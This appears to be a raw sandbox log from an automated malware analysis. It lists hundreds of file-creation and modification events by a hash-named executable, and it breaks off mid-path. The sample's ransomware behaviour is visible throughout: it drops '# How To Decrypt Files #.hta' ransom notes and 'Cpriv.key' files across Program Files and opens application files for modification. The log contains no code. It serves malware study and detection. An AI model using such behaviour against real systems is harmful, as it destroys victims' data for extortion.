de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\icon.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\144DPI\(144DPI)grayStateIcon.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-progress.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\validation.js de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\SportsMainToScenesBackground.wmv de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BOATINST.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\eclipse.inf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0233070.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SpringGreen.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_hail.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\trad_m.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\LEVEL\THMBNAIL.PNG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\vignettemask25.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152884.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Stationery\1033\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\cs\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\QUAD\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0199469.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0292982.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\BIZCARD.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\css\main.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.SYD de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\Locales\hu.pak de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\ECLIPSE_.RSA de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-templates_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_close_up.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\en-US\js\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\Help\3082\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_snow.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Lime\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\FormsMacroTemplate.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\EquityResume.Dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.w3c.dom.svg_1.1.0.v201011041433.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0240291.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.SE.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_blue_partly-cloudy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.w3c.dom.events_3.0.0.draft20060413_v201105210656.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0285360.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE03339_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\Help\1046\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Adobe.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\mobile_browse.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0183168.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\PROOF\MSWDS_ES.LEX de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.service.exsd de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0106124.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00345_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Internet Explorer\SIGNUP\install.ins de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jre7\lib\zi\America\Kentucky\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\pt.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-keyring-impl.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105298.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\images\back.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\CPU.Gadget\images\dialdot.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\images\graph_over.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\History.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\rtstreamsink.ax de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waning-crescent_partly-cloudy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\WebToolImagesMask16x16.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\HLS.api de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.manipulator.nl_zh_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00186_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00723_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\lua\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\hwrenalm.dat de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\SpecialOccasion\NavigationLeft_ButtonGraphic.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Pushpin.eftx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18227_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0 de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\novelty_settings.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0152610.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0252669.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BS00135_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0182888.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TR00482_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0251301.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.COM.TW.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\whiteband.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_ko_KR.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\QUERIES\MSN MoneyCentral Investor Currency Rates.iqy de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\Access\Events.accdt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105412.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\Discussion14.gta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Verve.eftx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\ELPHRG01.WAV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TN00011_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\ACCWIZ\UTILITY.ACCDA de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectTool\Project Report Type\Fancy\MINUS.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\fy\LC_MESSAGES\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\42.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AN01044_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00200_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Pets_image-frame-backglow.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\System\msadc\adcjavas.inc de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\photoedge_selectionsubpicture.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\MSPUB.DEV_COL.HXT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\icon.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\en-US\settings.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\NavigationUp_SelectionSubpicture.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-ui_zh_CN.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Media Player\Skins\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00694_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Microsoft.SharePoint.BusinessData.Administration.Client.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Fonts\Office Classic.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0199036.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PPINTL.REST.IDX_DLL de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR21F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\FORMS\1033\INFOMS.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\OriginMergeFax.Dotx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.alert.ja_5.5.0.165303.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-multitabs.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Mozilla Firefox\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0241043.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA00395_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SL00452_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\ADDINS\MSSPC.ECF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolBMPs\InformationIcon.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\SPRING\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Travel\header-background.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\OutlookAutoDiscover\SNET.NET.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SoftBlue\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\COMBOBOX.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\Installer\chrome.7z de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Office.en-us\PSCONFIG.CHM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\RMNSQUE\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\security\java.security de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_box_bottom.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\VBA\VBA6\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\ARCTIC\PREVIEW.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsOutgoingImageMask.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waning-gibbous_partly-cloudy.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\VSTA\Pipeline.v10.0\AddInSideAdapters\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\INDUST\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\diagnostic-command-16.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02398U.BMP de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\sk\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Windows NT\TableTextService\TableTextServiceDaYi.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Full\pushplaysubpicture.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0304371.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR3B.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\System\Ole DB\sqloledb.rll de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\BOLDSTRI\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\BL00148_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser_5.5.0.165303.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00276_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\Computers\computericon.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\lua\http\requests\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_CopyDrop32x32.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program 